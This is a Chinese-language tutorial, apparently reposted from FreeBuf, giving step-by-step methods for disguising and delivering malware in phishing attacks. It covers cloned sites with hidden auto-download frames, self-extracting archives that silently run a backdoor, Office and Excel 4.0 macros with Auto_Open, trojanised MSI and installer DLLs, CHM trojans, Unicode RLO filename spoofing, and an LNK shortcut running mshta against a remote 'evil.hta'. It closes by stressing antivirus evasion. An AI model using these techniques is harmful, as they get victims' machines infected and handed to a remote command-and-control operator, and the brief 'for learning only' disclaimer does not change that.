网页钓鱼

概述

克隆一个网站,将自己的木马放进去,访问网站自动下载exe。

详细步骤

先在c2上克隆网站:

1673491397_63bf73c5c3727d447b1dc.png!small

1673491402_63bf73ca78f214e9d163a.png!small

克隆好以后,由于我的local uri是/,所以直接访问服务器的网站url即可,进入后会看到一个克隆好的页面。

1673491410_63bf73d20bd2991681945.png!small

但是实际上有一个隐藏的框架会自动下载病毒。

1673491416_63bf73d8d2cc4005cb040.png!small

自解压

概述

利用winrar对后门exe与flash或其他正常文件进行绑定,并设置解压后自动运行。

详细步骤

使用winrar创建压缩文件,勾选上自解压。在高级->自解压选项进行配置。

自解压路径

设置自动解压的路径,最好使用绝对路径,再选择比较隐蔽的文件夹。

1673491426_63bf73e201fe429af327b.png!small

自动运行

解压后自动运行已解压的文件,需要写解压后的绝对路径+文件名。1673491433_63bf73e94e6a349a6174e.png!small

双击自动释放

自解压执行时,隐藏解压进度条。

1673491441_63bf73f1ad1cbb76543f9.png!small

覆盖解压

多次打开压缩包时,会自动解压并默认覆盖之前的文件,如果不设置该选项,会出现一个询问的窗口,可能会引起目标怀疑。

1673491453_63bf73fdaf75b825b44d1.png!small

文本和图标

新版winrar可以自定义自解压文件窗口标题、自解压文件图标,修改压缩包的图标可以更好的伪装。

1673491478_63bf74161178ff7382e49.png!small

Office宏

概述

在启用office宏功能的文件中插入病毒,打开时如果允许使用宏功能,会自动运行恶意代码导致上线。

详细步骤

Word

生成宏病毒代码

CS中->Attacks ->Packages -> MS Office Macro,点击Copy Marco,把病毒代码复制下来。

1673491485_63bf741d1d1da01fb4446.png!small

1673491489_63bf74218f097e4baa6d8.png!small

编辑宏

新建一个word文档,点击查看宏,进行宏代码编辑

1673491496_63bf74282926a7fb406b2.png!small

创建一个宏,宏名随便写

1673491500_63bf742c55eae233c4bf1.png!small

把之前复制的病毒代码粘贴进来,然后ctrl+s保存

1673491507_63bf743331a8623df3369.png!small

关闭宏模块,在宏功能中出现这三个宏即成功

1673491514_63bf743a4f15888948097.png!small

修改word文档格式,另存为.docm、或.dotm,只有这两个后缀默认启用宏功能。

1673491964_63bf75fc0a2fc833f4899.png!small

伪装

但是docm后缀过于明显,需要伪装,重命名文件,将后缀改为doc。

双击打开word文件后,如果此时宏功能关闭,会提示是否启用宏功能。如果启用宏功能,会自动运行恶意代码,cs直接上线

1673491939_63bf75e39b07fa2d19df7.png!small

Excel

新建宏表

在已有的工作表上右键 -> 插入-> MS Excel 4.0宏表

1673491537_63bf74515f98477a91de0.png!small

1673491548_63bf745c6fad47643f3e1.png!small

插入代码

在左上角第一个单元格(A1)内写入=EXEC("calc.exe"),下面一个单元格写入=HALT()用来停止执行。

点击第一个单元格,将A1修改为Auto_Open(自动执行)。

1673491556_63bf7464968ab2af882ca.png!small

将这个表隐藏起来

1673491560_63bf7468dfb957614a38f.png!small

另存为启用宏的工作簿

1673491566_63bf746eb6bf5db90f47e.png!small

也可以在保存成功后,将.xlsm修改为.xls,但是打开时会有一个格式类的提示

1673491574_63bf74761eb1bf1aa6c49.png!small

仍然打开,并启用宏,cs成功上线

1673492008_63bf7628cdcfb38e9d9f6.png!small

MSI文件

概述

.msi文件一般为安装包,将病毒添加到.msi文件中,运行.msi文件即可上线

详细步骤

使用Advanced Installer制作msi

汉化版便携链接:https://pan.baidu.com/s/1q62tbJL9Jw8WxHHJeLKCtQ?pwd=itnf

提取码:itnf

1673491587_63bf74834a5574fec7f1f.png!small

自定义文件信息

1673491607_63bf749778cfbb8107c49.png!small

添加木马文件

1673491616_63bf74a04f1f52b1abc93.png!small

1673491624_63bf74a8b810fef84953d.png!small

外部对象(OLE)

概述

word 中插入外部对象(OLE)方式欺骗目标

详细步骤

新建对象

在word文档中->插入->对象->由文件创建->浏览,选择病毒文件。然后选择更改图标,修改图标和题注进行伪装(题注可以随便修改,不用担心后缀问题)。

1673492229_63bf7705188f01f88c883.png!small

1673491640_63bf74b844e8168d583cc.png!small

注意

直接双击ole对象会被office阻止,需要把他复制到文件夹中再打开,所以exe也需要做好伪装。

1673491646_63bf74be9d5624a561e86.png!small

1673491650_63bf74c2edac44afabd75.png!small

CHM帮助文档

概述

CHM是英语“Compiled Help Manual”的简写,即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。

CHM文件格式是微软1998年推出的基于HTML文件特性的帮助文件系统,以替代早先的WinHelp帮助系统,它也是一种超文本标识语言,在Windows 98中把CHM类型文件称作“已编译的HTML帮助文件”。被IE浏览器支持的Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,CHM同样支持,并可以通过URL与Internet联系在一起。

CHM文件因为使用方便,形式多样也被采用作为电子书的格式。

在普通用户眼里,CHM文件与txt文件一般无二,防御心理较弱。因此,一旦制作CHM文件木马,其传递更方便,危害更广。

恰恰,CHM支持脚本语言编程,这为制作木马,产生了天然的便利条件。

详细步骤

制作

CHM文件(编译的 HTML 帮助文件)。

使用EasyCHM(windows自带)创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件,在两个文件夹内部创建各创建一个index.html文件。要求这三个index.html文件代码都是正常运行的html代码。

修改最外层的index.html,添加恶意代码(以弹计算器为例)1673491661_63bf74cdaa7f4b92c3034.png!small

运行

打开chm文件

1673491670_63bf74d6188d987ae5dcc.png!small

点击相应的目录文件触发恶意代码

1673491676_63bf74dcc316c5fdef1ad.png!small

图标替换+Unicode RLO 反转字符

概述

替换文件的图标,反转文件名

详细步骤

替换图标

生成artifact.exe木马,将exe拖入Resource Hacker,选择操作->添加图像或其他二进制资源,可以选择从资源文件添加图像

1673491685_63bf74e54c59abebb7a9e.png!small

使用图标替换后的文件,将文件名改为:办卡步骤cod.exe

1673491691_63bf74eb08153d22491d7.png!small

反转文件名

重命名->光标移动到cod前面右键->插入Unicode控制符->插入RLO

1673491697_63bf74f12bf1852259189.png!small

1673491710_63bf74fe9ea0c0e2b4f27.png!small

双击后上线

1673491717_63bf7505e304c05d4895b.png!small

LNK链接-恶意命令执行

概述

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,是一个独立的应用软件。

详细步骤

创建恶意Hta

先用cs生成一个hta文件,选择powershell类型

1673491725_63bf750dd2d779eccb467.png!small

1673491730_63bf75127696171719092.png!small

伪装

修改hta文件,添加如下代码

1673491736_63bf7518e0491bb11cc54.png!small

新建快捷方式,对象位置设置如下(用mshta上线):

%windir%\System32\mshta.exe http://172.20.10.3/evil.hta

// 使用windows自带的mshta.exe(类似于bash),运行evil.hta

1673491747_63bf75236b3be2ddbef2d.png!small

修改link图标

1673491753_63bf75299e28da7943010.png!small

双击.lnk后,打开图片+后台CS上线1673509994_63bfbc6a917569d620966.png!small?1673509994810

白+黑(dll劫持)

概述

压缩包中存在一个正常exe文件,和一个恶意dll,运行exe以后会加载dll,功能正常使用的同时CS也会上线。

注:windows dll文件加载优先顺序:

  1. EXE所在目录;
  2. 当前目录GetCurrentDirectory();
  3. 系统目录GetSystemDirectory();
  4. WINDOWS目录GetWindowsDirectory();
  5. 环境变量 PATH 所包含的目录。

详细步骤

先找到.exe文件依赖哪些dll,以wps为例

1673491766_63bf7536f06296bf20dfe.png!small

使用Visual Studio修改dll,添加恶意代码

1673510019_63bfbc838d70afc4f8565.png!small?1673510019704

运行时加载恶意dll,弹出计算器

1673491779_63bf754359fb4cc00a8f9.png!small

参考链接

https://www.bilibili.com/video/BV1T34y1h7eP/?spm_id_from=333.999.0.0&vd_source=85744a3ebded8f1a438abca45fedefc3

安装包篡改

概述

安装包中会存在一些依赖性的dll文件,在运行安装程序时会自动加载这些内置dll,将恶意dll注入其中,安装包运行时就会触发恶意dll。

详细步骤

在c2中生成一个恶意dll文件

1673491788_63bf754c62311107797aa.png!small

使用拿破轮胎大佬的dll注入工具进行注入

工具地址:

链接:https://pan.baidu.com/s/1EEYOSBmD-zGODIm5hkJD1w?pwd=9qno

提取码:9qno

1673510045_63bfbc9d4501c571a980c.png!small?1673510045793

使用Stud_PE查看安装包内容

1673510062_63bfbcaeba0001b01a335.png!small?1673510062914

运行安装包就可以在后台自动上线

1673491842_63bf758214e70fe3c4f81.png!small

总结

上述伪装方式仅供学习交流,最最最重要的还是免杀!免杀!免杀!有些方式被杀软重点盯着,例如反转文件名,反转以后无论黑白软件,一律按病毒算。如果没有一个好的免杀,伪装做的再好也没用。

本文作者:Chi1ld, 转自FreeBuf